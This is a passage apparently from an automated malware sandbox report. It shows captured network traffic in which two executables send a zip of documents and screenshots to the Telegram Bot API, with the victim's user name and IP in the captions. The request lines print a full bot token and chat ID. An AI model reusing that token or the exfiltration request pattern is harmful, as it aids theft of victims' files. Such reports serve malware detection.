                                                                                      Data Ascii: var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.A=b.prototype}function ma(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=argu
                                                                                      Nov 27, 2024 20:46:36.372092009 CET1236INData Raw: 67 65 22 29 29 7c 7c 28 43 28 29 3f 41 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 42 28 22 45 64 67 2f 22 29 29 7c 7c 43 28 29 26 26 41 28 22 4f 70 65 72 61 22 29 29 3b 76 61 72 20 73 61 3d 7b 7d 2c 45 3d 6e 75 6c 6c 3b 76 61 72 20
                                                                                      Data Ascii: ge"))||(C()?A("Microsoft Edge"):B("Edg/"))||C()&&A("Opera"));var sa={},E=null;var ta="undefined"!==typeof Uint8Array,ua=!ra&&"function"===typeof btoa;var F="function"===typeof Symbol&&"symbol"===typeof Symbol()?Symbol():void 0,G=F?function(a,b
                                                                                      Nov 27, 2024 20:46:36.372106075 CET1236INData Raw: 61 79 28 61 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 64 3d 48 28 61 29 3b 69 66 28 64 26 36 34 29 72 65 74 75 72 6e 20 61 3b 64 7c 3d 36 34 3b 69 66 28 63 26 26 28 64 7c 3d 35 31 32 2c 63 21 3d 3d 61 5b 30 5d 29 29 74 68 72 6f 77 20 45 72
                                                                                      Data Ascii: ay(a))throw Error();d=H(a);if(d&64)return a;d|=64;if(c&&(d|=512,c!==a[0]))throw Error();a:{c=a;var e=c.length;if(e){var f=e-1,g=c[f];if(N(g)){d|=256;b=(d>>9&1)-1;e=f-b;1024<=e&&(za(c,b,g),e=1023);d=d&-2095105|(e&1023)<<11;break a}}b&&(g=(d>>9&
                                                                                      Nov 27, 2024 20:46:36.372121096 CET1236INData Raw: 3d 62 5b 28 77 26 31 35 29 3c 3c 32 7c 68 3e 3e 36 5d 3b 68 3d 62 5b 68 26 36 33 5d 3b 63 5b 65 2b 2b 5d 3d 67 2b 6b 2b 77 2b 68 7d 67 3d 30 3b 68 3d 64 3b 73 77 69 74 63 68 28 61 2e 6c 65 6e 67 74 68 2d 66 29 7b 63 61 73 65 20 32 3a 67 3d 61 5b
                                                                                      Data Ascii: =b[(w&15)<<2|h>>6];h=b[h&63];c[e++]=g+k+w+h}g=0;h=d;switch(a.length-f){case 2:g=a[f+1],h=b[(g&15)<<2]||d;case 1:a=a[f],c[e]=b[a>>2]+b[(a&3)<<4|g>>4]+h+d}a=c.join("")}return a}}return a};function Ba(a,b,c){a=Array.prototype.slice.call(a);var d=
                                                                                      Nov 27, 2024 20:46:36.372142076 CET1236INData Raw: 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 48 61 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 63 7c 7c 62 26 32 3f 4b 3a 78 61 2c 65 3d 21 21 28 62 26 33 32 29 3b 61 3d 42 61 28 61 2c 62 2c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e
                                                                                      Data Ascii: urn a}}function Ha(a,b,c){var d=c||b&2?K:xa,e=!!(b&32);a=Ba(a,b,function(f){return Ga(f,e,d)});G(a,32|(c?2:0));return a};function Ia(a,b){a=a.h;return Ja(a,J(a),b)}function Ja(a,b,c,d){if(-1===c)return null;if(c>=L(b)){if(b&256)return a[a.leng
                                                                                      Nov 27, 2024 20:46:36.372549057 CET1236INData Raw: 74 6f 4a 53 4f 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 45 61 28 74 68 69 73 2e 68 2c 46 61 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 21 31 2c 21 31 29 3b 72 65 74 75 72 6e 20 50 61 28 74 68 69 73 2c 61 2c 21 30 29 7d 3b 54 2e
                                                                                      Data Ascii: toJSON=function(){var a=Ea(this.h,Fa,void 0,void 0,!1,!1);return Pa(this,a,!0)};T.prototype.s=M;T.prototype.toString=function(){return Pa(this,this.h,!1).toString()}; function Pa(a,b,c){var d=a.constructor.v,e=L(J(c?a.h:b)),f=!1;if(d){if
                                                                                      Nov 27, 2024 20:46:36.372564077 CET1236INData Raw: 28 61 29 7b 74 68 69 73 2e 68 3d 52 28 61 29 7d 6e 28 52 61 2c 54 29 3b 76 61 72 20 53 61 3d 51 61 28 52 61 29 3b 76 61 72 20 55 3b 66 75 6e 63 74 69 6f 6e 20 56 28 61 29 7b 74 68 69 73 2e 67 3d 61 7d 56 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53
                                                                                      Data Ascii: (a){this.h=R(a)}n(Ra,T);var Sa=Qa(Ra);var U;function V(a){this.g=a}V.prototype.toString=function(){return this.g+""};var Ta={};function Ua(){return Math.floor(2147483648*Math.random()).toString(36)+Math.abs(Math.floor(2147483648*Math.random())
                                                                                      Nov 27, 2024 20:46:36.372581959 CET1236INData Raw: 32 46 74 59 6d 56 79 58 7a 49 30 5a 48 41 75 63 47 35 6e 22 29 2c 61 62 3d 70 2e 61 74 6f 62 28 22 57 57 39 31 49 47 46 79 5a 53 42 7a 5a 57 56 70 62 6d 63 67 64 47 68 70 63 79 42 74 5a 58 4e 7a 59 57 64 6c 49 47 4a 6c 59 32 46 31 63 32 55 67 59
                                                                                      Data Ascii: 2FtYmVyXzI0ZHAucG5n"),ab=p.atob("WW91IGFyZSBzZWVpbmcgdGhpcyBtZXNzYWdlIGJlY2F1c2UgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlIGlzIGludGVyZmVyaW5nIHdpdGggdGhpcyBwYWdlLg=="),bb=p.atob("RGlzYWJsZSBhbnkgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlLCB0aGVu
                                                                                      Nov 27, 2024 20:46:36.491868019 CET1236INData Raw: 2c 22 49 4d 47 22 29 3b 64 2e 63 6c 61 73 73 4e 61 6d 65 3d 55 61 28 29 3b 64 2e 73 72 63 3d 24 61 3b 64 2e 61 6c 74 3d 22 57 61 72 6e 69 6e 67 20 69 63 6f 6e 22 3b 64 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 32 34 70 78 22 3b 64 2e 73 74 79
                                                                                      Data Ascii: ,"IMG");d.className=Ua();d.src=$a;d.alt="Warning icon";d.style.height="24px";d.style.width="24px";d.style["padding-right"]="16px";var e=X(a),f=X(a);f.style["font-weight"]="bold";f.textContent=ab;var g=X(a);g.textContent=bb;Y(a,e,f);Y(a,e,g);Y(


                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.549758149.154.167.2204434848C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-27 19:46:39 UTC557OUTPOST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-FG:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 18469
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:46:39 UTC16355OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 46 69 6c 65 73 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 08 00 25 4a 44 57 95 fa 9e d0 82 02 00 00 02 04 00 00 15 00 00 00 46 69 6c 65 73 2f 41 46 57 41 41 46 52 58 4b 4f 2e 64 6f 63 78 15 92 49 72 40 21 08 44 f7 a9 ca a1 14 15 07 9c e5 8b de ff 20 31 5b 16 54 77 bf a7 dc 56 ca 0d 49 35 e4 c3 cb ea 44 e0 0e cf dc 92 26 fa e8 c0 9d fa 74
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="Files.zip"Content-Type: application/octet-streamPK%JDWFiles/AFWAAFRXKO.docxIr@!D 1[TwVI5D&t
                                                                                      2024-11-27 19:46:39 UTC2114OUTData Raw: f5 f1 10 19 35 ad d0 96 5c 9f 68 31 e2 1d 9e 03 26 7e 05 ee 31 99 e9 f4 eb b8 cd d5 d2 45 55 37 31 a4 33 c2 2c b6 cf ec 78 26 9a 29 3a 42 89 ce ce b8 df 31 68 63 f5 fe 85 02 90 47 30 33 29 4d bb b5 65 70 5a 34 a2 d1 8e 16 22 f3 4b 83 6d 0a 27 3b 2b 2b 15 55 86 6e 3a 66 93 2f 8a b9 07 e1 90 7a a4 f8 05 d3 9a d0 a7 6d 2f 85 1c 1c c2 8e 35 1c 99 6d 2b 77 6e 6a 19 2a b3 8a fc 32 2c 9d f5 8b d2 3f cc cb 65 56 30 ce 3e fd fc 32 c5 14 35 87 cd 58 3a 83 5d 7c 38 3d fc 00 3e 7b c7 83 d1 ae 92 21 83 4e fc 3c bb 22 f3 72 e6 94 c7 a7 ad 45 d5 cf ad e6 fa 09 f5 da 8e 35 f8 fd 8a b6 5f 26 63 52 3c dc d9 fb e6 1c f9 a4 f0 a4 12 42 c1 5e a9 ea e3 d5 e6 40 da 19 a0 02 e5 7d cf 5b 19 01 96 a2 23 c7 00 7e 5f e8 d5 4f f4 ed 52 35 bd be d9 d6 eb 9f 57 93 78 87 be ea eb 39 5c
                                                                                      Data Ascii: 5\h1&~1EU713,x&):B1hcG03)MepZ4"Km';++Un:f/zm/5m+wnj*2,?eV0>25X:]|8=>{!N<"rE5_&cR<B^@}[#~_OR5Wx9\
                                                                                      2024-11-27 19:46:40 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:46:40 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 543
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2024-11-27 19:46:40 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 37 33 36 38 30 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 46 69 6c 65
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":3543,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1732736800,"document":{"file_name":"File


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.549786149.154.167.2204434848C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-27 19:46:53 UTC559OUTPOST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:46:53 UTC16355OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 4f 6c 4d 67 57 45 45 67 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotOlMgWEEg.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      2024-11-27 19:46:53 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:46:53 UTC16355OUTData Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00
                                                                                      Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-27 19:46:53 UTC16355OUTData Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:46:53 UTC16355OUTData Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-27 19:46:53 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:46:53 UTC16355OUTData Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14
                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-27 19:46:53 UTC16355OUTData Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:46:53 UTC232OUTData Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-27 19:46:53 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:47:00 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:46:59 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 553
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.549788149.154.167.2204434676C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-27 19:46:54 UTC559OUTPOST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
